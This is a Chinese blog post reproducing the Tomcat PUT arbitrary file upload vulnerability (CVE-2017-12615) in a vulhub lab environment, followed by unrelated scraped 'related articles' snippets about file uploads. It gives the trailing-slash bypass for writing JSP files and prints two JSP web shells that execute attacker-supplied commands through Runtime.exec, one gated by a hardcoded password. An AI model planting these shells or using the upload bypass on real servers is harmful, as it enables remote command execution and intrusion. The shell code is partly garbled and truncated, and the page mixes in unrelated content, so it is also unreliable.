漏洞背景:

tomcat(7.0.0-7.8.1)服务器,开启了HTTP PUT请求方法,web.xml文件中的readonly值设置未false

漏洞环境:

使用vulhub环境,直接dockers安装

安装成功:

安装vulhub详见:

https://vulhub.org/#/index/

漏洞利用:

直接抓包进行修改

1、修改为put方法

2、写入shell

测试是否开启PUT方法

写入shell(注意需要在文件名后面加上一个/进行过滤绕过,未加/会报错,如果写入一个txt文件则不用加/且不会报错)

测试结果

shell(linux下使用,我之前用了一个Windows的,执行报错)

"java" import=public static String excuteCmd(String c) {  StringBuilder line = new StringBuilder();  try {    Process pro = Runtime.getRuntime().exec(c);    BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));    String temp = null;    while ((temp = buf.readLine()) != null) {      line.append(temp + "\\n");      }      buf.close();    } catch (Exception e) {      line.append(e.getMessage());    }    return line.toString();} %>    if(

else{out.println(":-)");}%>

shell(windows,未使用过,一个大佬的复现使用的)

    if("123".equals(request.getParameter("pwd"))){        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();        int a = -1;                  byte[] b = new byte[1024];                  out.print("
"

); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(" } %>

后续再试着使用其它的shell及工具(CVE-2017-12615漏洞利用工具)进行测试,提高效率

dockers log查询dockers的文件_Tomcat PUT方法任意文件上传相关推荐

  1. 向web服务器传文件,c++实现向web服务器上传文件

    [实例简介] vs2013 c++实现上传的客户端,服务端为java写的web工程,模拟post方法,可以上传大文件 [实例截图] [核心代码] c向web服务器上传文件 └── c++ 向web服务 ...

  2. 10个MySQL加载数据内文件示例以将文本文件数据上传到表

    10个MySQL加载数据内文件示例以将文本文件数据上传到表 如果文本文件中有数据,则可以轻松地将它们上载到数据库中的一个或多个表. 在MySQL数据库(或MariaDB)中,使用" load ...

  3. vue+elementui 同时有上传文件和批量上传文件功能,上传文件或批量上传文件后必须刷新才能再次上传文件

    报错描述: 使用element-ui的上传文件组件写一个批量上传和上传文件,但是发现每次上传文件后或者批量上传文件后,不能再次上传文件或者批量上传文件.只有进入页面第一次点击上传文件或者批量上传文件才 ...

  4. java下载文件到服务器_java代码实现上传文件到文档服务器、下载文档服务器文件...

    需要完成下载->修改->上传这三个步骤 平台有提供对应的api吗? /** 首先我们来理解下关于文档的api 文档相关api都在这2个package下面 package :com.just ...

  5. vue-simple-uploader实现多文件/文件夹以及可拖拽上传

    vue-simple-uploader的简单使用 1.效果图展示 2.安装 3.vue2使用(vue3使用会报错) 4.代码 vue-simple-uploader是基于simple-uploader ...

  6. Python监控目录文件夹,并使用SFTP上传目录及文件到linux服务器

    Python 扫描监控本地文件夹并进行超大文件上传 方案1:WebUploader大文件分块多线程并发上传 方案2:watchdog目录文件夹监控,paramiko STFP上传服务器 方案3:优化2 ...

  7. JSP中的文件操作:数据流、File类、文件浏览、目录操作、上传下载

    ​ 文件可以永久地存储信息,从本质上讲文件就是存放在盘上的一系列数据的集合.应用程序如果想长期保存数据,就必须将数据存储到文件中,这就涉及到文件的操作.而在编写网站应用程序的过程中,有许多地方要对文件 ...

  8. java web文件夹_JAVA WEB项目文件夹上传下载解决方案

    这里只写后端的代码,基本的思想就是,前端将文件分片,然后每次访问上传接口的时候,向后端传入参数:当前为第几块文件,和分片总数 下面直接贴代码吧,一些难懂的我大部分都加上注释了: 上传文件实体类: 看得 ...

  9. aws php 上传文件 限制大小_单个文件大小 上传百度云盘 微信发送 有大小限制 怎么破?...

    问题描述 百度云盘,单个文件20G,如果一个文件太大,就不能上传成功. 微信发送文件,单个文件100Mb,如果太大,就无法发送. QQ也有类似限制 如果解决呢??? 问题解决 使用rar文件压缩,或者 ...

最新文章

  1. 一款强大而实用的图片去水印神器
  2. ABP学习 解决:Update-Database : 无法将“Update-Database”项识别为 cmdlet、函数、脚本文件或可运行程序的名称的问题
  3. python处理excel视频-从零基础开始用Python处理Excel数据 视频教程
  4. flirtlib 测试过程
  5. java spring框架 注解_详解Java的Spring框架中的注解的用法
  6. 红罐王老吉品牌定位战略制定过程详解
  7. java获取公网ip_动态IP变固定IP,国内IP变海外IP,助力企业数据传输提高工作效率...
  8. redis解决了分布式系统的session一致性问题
  9. 学习SpringBoot(1)入门及简单的配置
  10. Oracle服务的作用
  11. 贝叶斯优化核极限学习机KELM用于回归预测
  12. 天堂2 服务器修改,服务器技术交流_新天堂2-战乱的序幕架设教程_-921根据地_只做有质量的游戏 - Powered by Discuz!...
  13. 网站制作必备-在线按钮生成器,LOGO生成器,背景生成器,ICO图标生成器,和许多在线小工具...
  14. sql server 常用工具
  15. RK3399 修改android桌面图标默认大小
  16. linux 执行 ktr脚本,kettle在linux下面用于shell脚本执行:转换或者作业
  17. 从微信公众号获取关注名单
  18. spring 定时器时间配置
  19. 基于人工智能与大数据的城市治安防控体系建设方案-2022-01版
  20. 外贸企业邮箱哪个好用,常用的外贸邮件系统有哪些?

热门文章

  1. 一张图学会数据库迁云最佳路径
  2. 从质疑到成为必选项,低代码技术发展及 2022 展望
  3. 数据结构是如何装入 CPU 寄存器的?
  4. i 智慧 | IBM存储:全面贯彻新存储的“智慧之道”
  5. Cloud一分钟 |格力电器营收比去年增长500亿元; 红黄蓝加盟停不下来;中美双方同意停止相互加征新的关税...
  6. 云漫圈 | 革命版互联网公司虐恋大戏,周一拿去怼业务!
  7. 调用某个按钮事件_Event 对象之事件句柄 (Event Handlers)
  8. quill鼠标悬浮 出现提示_CHERRY MC8.1鼠标评测:超前设计延续军火箱信仰
  9. java中img属性_如果html img的src属性无效,请输入默认图像?
  10. location 拦截所有_电脑广告拦截软件 Adguard Premium